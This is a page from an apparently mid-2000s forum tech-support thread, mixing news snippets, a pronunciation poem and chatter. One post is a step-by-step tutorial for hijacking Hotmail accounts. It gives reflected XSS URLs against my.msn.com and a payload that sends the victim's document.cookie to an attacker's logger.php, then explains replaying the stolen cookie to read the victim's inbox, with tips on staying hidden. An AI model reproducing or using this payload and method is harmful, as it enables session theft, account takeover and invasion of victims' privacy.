Jump to content

<<< 12Oz Computer Tech Support SuperThread >>>

Mainter

By Mainter
in Channel Zero

 Share

Recommended Posts

This forum is supported by the 12ozProphet Shop, so go buy a shirt and help support!
This forum is brought to you by the 12ozProphet Shop.
This forum is brought to you by the 12oz Shop.
  • Replies 16.8k
  • Created
  • Last Reply

Top Posters In This Topic

  • lord_casek

    3772

  • Seffiks

    2661

  • Mainter

    2483

  • johnny ballbags

    479

Popular Days

Top Posters In This Topic

Popular Days

Popular Posts

GnomeToys
GnomeToys

CHALLENGE ACCEPTED

Dirty_habiT
Dirty_habiT

Computer security has many facets.  My basic recommendations for a home user are the following:   * Use a good brand of router, do not rely upon what the telco provided you to be secure.

KILZ FILLZ
KILZ FILLZ

@Tails0nEmaybe try asking here  @Dirty_habiTis pretty good with the ‘puters 

Posted Images

Mainter

Mainter

Posted
  • Author
Posted

Re: «<< 12Oz Computer Tech Support >>>

 

HD DVD movies can be copied, and all it takes is the presses of a single button on any PC's keyboard. Well, lots of presses. Lots and lots of presses. Lots and lots and lots of presses.

 

Yes, keep hitting that Print Screen button and, according to Germany's c't magazine, one the movie's finished playing, you'll have enough screen grabs to reconstruct the film - illegally of course - in all its high resolution glory.

 

And in case you think Blu-ray is any safer - the c't guys tried the same technqiue out on a Sony Vaio fitted with a BD drive. The HD DVD unit was in a Toshiba Qosmio G30. Both computers were running bundled copies of WinDVD.

 

That said, it's a tiresome way to copy a movie, much like photocopying a book page by page. But c't warns it's possible to automate all that furious Print Screen pressing. Until, of course, Intervideo patches WinDVD. ®

Link to comment
Share on other sites
Mainter

Mainter

Posted
  • Author
Posted

Re: «<< 12Oz Computer Tech Support >>>

 

English is Tough Stuff

 

Multi-national personnel at NATO headquarters near Paris found English to be an easy language ... until they tried to pronounce it. To help them discard an array of accents, the verses below were devised. After trying them, a Frenchman said he'd prefer six months hard labour to reading six lines aloud. Try them yourself.

 

 

 

Dearest creature in creation,

Study English pronunciation.

I will teach you in my verse

Sounds like corpse, corps, horse, and worse.

I will keep you, Suzy, busy,

Make your head with heat grow dizzy.

Tear in eye, your dress will tear.

So shall I! Oh, hear my prayer.

 

 

 

Just compare heart, beard, and heard,

Dies and diet, lord and word,

Sword and sward, retain and Britain.

(Mind the latter, how it's written.)

Now I surely will not plague you

With such words as plaque and ague.

But be careful how you speak:

Say break and steak, but bleak and streak;

Cloven, oven, how and low,

Script, receipt, show, poem, and toe.

 

 

 

Hear me say, devoid of trickery,

Daughter, laughter, and Terpsichore,

Typhoid, measles, topsails, aisles,

Exiles, similes, and reviles;

Scholar, vicar, and cigar,

Solar, mica, war and far;

One, anemone, Balmoral,

Kitchen, lichen, laundry, laurel;

Gertrude, German, wind and mind,

Scene, Melpomene, mankind.

 

 

 

Billet does not rhyme with ballet,

Bouquet, wallet, mallet, chalet.

Blood and flood are not like food,

Nor is mould like should and would.

Viscous, viscount, load and broad,

Toward, to forward, to reward.

And your pronunciation's OK

When you correctly say croquet,

Rounded, wounded, grieve and sleeve,

Friend and fiend, alive and live.

 

 

 

Ivy, privy, famous; clamour

And enamour rhyme with hammer.

River, rival, tomb, bomb, comb,

Doll and roll and some and home.

Stranger does not rhyme with anger,

Neither does devour with clangour.

Souls but foul, haunt but aunt,

Font, front, wont, want, grand, and grant,

Shoes, goes, does. Now first say finger,

And then singer, ginger, linger,

Real, zeal, mauve, gauze, gouge and gauge,

Marriage, foliage, mirage, and age.

 

 

 

Query does not rhyme with very,

Nor does fury sound like bury.

Dost, lost, post and doth, cloth, loth.

Job, nob, bosom, transom, oath.

Though the differences seem little,

We say actual but victual.

Refer does not rhyme with deafer.

Foeffer does, and zephyr, heifer.

Mint, pint, senate and sedate;

Dull, bull, and George ate late.

Scenic, Arabic, Pacific,

Science, conscience, scientific.

 

 

 

Liberty, library, heave and heaven,

Rachel, ache, moustache, eleven.

We say hallowed, but allowed,

People, leopard, towed, but vowed.

Mark the differences, moreover,

Between mover, cover, clover;

Leeches, breeches, wise, precise,

Chalice, but police and lice;

Camel, constable, unstable,

Principle, disciple, label.

 

 

 

Petal, panel, and canal,

Wait, surprise, plait, promise, pal.

Worm and storm, chaise, chaos, chair,

Senator, spectator, mayor.

Tour, but our and succour, four.

Gas, alas, and Arkansas.

Sea, idea, Korea, area,

Psalm, Maria, but malaria.

Youth, south, southern, cleanse and clean.

Doctrine, turpentine, marine.

 

 

 

Compare alien with Italian,

Dandelion and battalion.

Sally with ally, yea, ye,

Eye, I, ay, aye, whey, and key.

Say aver, but ever, fever,

Neither, leisure, skein, deceiver.

Heron, granary, canary.

Crevice and device and aerie.

 

 

 

Face, but preface, not efface.

Phlegm, phlegmatic, ass, glass, bass.

Large, but target, gin, give, verging,

Ought, out, joust and scour, scourging.

Ear, but earn and wear and tear

Do not rhyme with here but ere.

Seven is right, but so is even,

Hyphen, roughen, nephew Stephen,

Monkey, donkey, Turk and jerk,

Ask, grasp, wasp, and cork and work.

 

 

 

Pronunciation -- think of Psyche!

Is a paling stout and spikey?

Won't it make you lose your wits,

Writing groats and saying grits?

It's a dark abyss or tunnel:

Strewn with stones, stowed, solace, gunwale,

Islington and Isle of Wight,

Housewife, verdict and indict.

 

 

 

Finally, which rhymes with enough --

Though, through, plough, or dough, or cough?

Hiccough has the sound of cup.

My advice is just give up!

Link to comment
Share on other sites
lord_casek

lord_casek

Posted
Posted

Re: «<< 12Oz Computer Tech Support >>>

 

Casek....is that a FreeBSD screenshot?

 

ARE YOU COMING OVER TO THE POSIX SIDE???

 

nah, it's a command prompt in winblows showing telnet.

 

ridethefire: what firmware you using in your router? anything interesting?

 

that whisky bottle computer is bad ass. i'm getting some mini atx shits going on soon for media center pc's. i'm gonna start building them. it's the new thing. pretty soon most people you know will have them (if they're cool).

Link to comment
Share on other sites
Mainter

Mainter

Posted
  • Author
Posted

Re: «<< 12Oz Computer Tech Support >>>

 

Mac OS Update Sparks Privacy Concern

July 6 - 1:58 PM ET

 

Some Macintosh users are complaining about a new feature added in the latest update to Mac OS X that periodically checks in with Apple Computer without the user's knowledge. The feature checks to see if widgets on the Dashboard are authentic.

 

http://www.betanews.com/article/Mac_OS_Update_Sparks_Privacy_Concern/1152207975

Link to comment
Share on other sites
Mainter

Mainter

Posted
  • Author
Posted

Re: «<< 12Oz Computer Tech Support >>>

 

Report: AOL Considering Free Access

 

AOL is considering a plan that would give away access to its service for free to anybody who has a broadband connection. Such a move would be a serious gamble; the company would need to make up some $2 billion in subscription revenue alone.

 

 

would this make you go back to AOL?

Link to comment
Share on other sites
Mainter

Mainter

Posted
  • Author
Posted

Re: «<< 12Oz Computer Tech Support >>>

 

Hacking Hotmail through XSS

Introduction

 

Microsoft's code is not always secure. This is very clear, once again, with this XSS exploit. This is not the first XSS exploit that has been found, others before it can attest it.

 

How

 

The idea is simple. When you are logged-in into Hotmail, a cookie is created which allows you access every time you are in it's domain. Since the cookie is not IP-bound (how is this possible? - Microsoft) we are able to fake the cookie. Once stolen, we are able to use it to login.

 

What this all means is that we do not need to know the password or even the email address of the victim. Through XSS we can insert a piece of javascript code that will send the cookie to a webserver with a log script. This can be written in PHP, ASP, CGI - practically any language you want. The cookie can be faked with Proxomitron.

 

 

Where

 

Finding an exploitable webpage is like being 50% based on pure luck. Or you have a really awful amount of time to spend. There is software that is written for auto-searching XSS exploits. Dont use it - it's crap, clear thinking is enough.

 

When searching, keep these points in mind:

 

1. The page where you are searching for must be in the domain, which is specified in the cookie. On the pages with 'Logout' buttons in Hotmail, you are using that cookie. I would recommend you adding some bookmark displaying your cookie, like javascript:alert(document.cookie); .

 

2. You can use practically any browser, though i'd recommend Mozilla Firefox. It is stable, secure, and available on almost any OS. Opera or Internet Explorer are ok to use as well, if you like them better. One good benefit of using Opera is that it lets you manage your own cookies.

 

3. If you want to be stealthy use TOR or a proxy. You should be aware though that DNS Leaking is still dangerous

 

 

In my search it took me 4 to 5 hours to find three exploits. I will discuss one only.

 

After having a short look at the cookie, I decided to just start the search. Except for your security, no other preparations are needed. Focus yourself on URL's with GET variables - they are often vulnerable. And, when you opened up a new page, check if your cookie is still equal to Hotmail's login page cookie. Start replacing a GET-variable in the url one by one. Reload the page and view the page source. Check in the source if there are also images or URL's which also contain GET variables, you might be able to exploit these. Is your replaced variable there, try to make it in a way that it ends valid html/javascript and can display an error for you. Often special characters are escaped. A nice all-around variable is something like hya"'><)(ho .

 

Exploit

 

The normal URL:

 

http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1& m=&col=1&tab=3

 

The test URL:

 

http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m= hya"'><ho&col=1&tab=3

 

A ctrl+f in the source for hya gave the invalid input:

 

<input type="hidden" name="m" value="hya"'><ho" />

 

To alert the cookie, it needs to be like this. Fortunately special characters were not escaped:

 

<input type="hidden" name="m" value="hya"><script>alert(document.cookie)</script><br class="ho" />

 

The exploited URL:

 

http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=

hya"><script>alert(document.cookie)</script><br class="ho&col=1&tab=3

 

Finish

 

I assume you have the knowledge to at least figure things out yourself, so I am not going to much in details. In the last examples the cookie was alerted by javascript. We need the cookie to be send to a webserver, and there it needs to be logged. I assume you know how to create a logging file. Replace my code by your file where needed.

 

This is the edited URL so it sends the cookie to an webserver.

 

http://my.msn.com/newmodule.armx?tok=TVJmHF%2bsBJ5RdVvt67SjWQ%3d%3d&page=1&m=

hya"><script>location.href='http://yourserver/logger.php?cookie= '%2Bescape(document.cookie)</script><br

class="ho&col=1&tab=3

 

This is the link the victim should click. As soon as he clicks it, his cookie is being sent to your server, resulting to be saved in your logfile. You can display some innocent error or redirect to an other page.

 

Next, get Proxomitron. Configure your browser to use it. Fire up proxomitron, go to headers, and fill in the cookie data from your logfile into a fake cookie header (there is one by default). Make sure you have checked the 'out' box. Go to http://my.msn.com/. The inbox of your victim is all yours. If this does not work immediately, a cookie is not made yet. Just go to http://my.msn.com/ again.

Link to comment
Share on other sites
Mainter

Mainter

Posted
  • Author
Posted

Re: «<< 12Oz Computer Tech Support >>>

 

tired of getting 60Hz or 75Hz in your favorite OpenGL/Direct3D/DirectX games (e.g. Quake 1/2/3, Half-Life, Unreal, or Deus Ex) instead of the 120Hz your display adapter & monitor are capable of? Yes?

Then download this, and enjoy higher display frequencies without the hassle of installing special drivers

 

Download

 

only gamers should download this with a good monitor or you will cut the life of it to 5 minutes

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...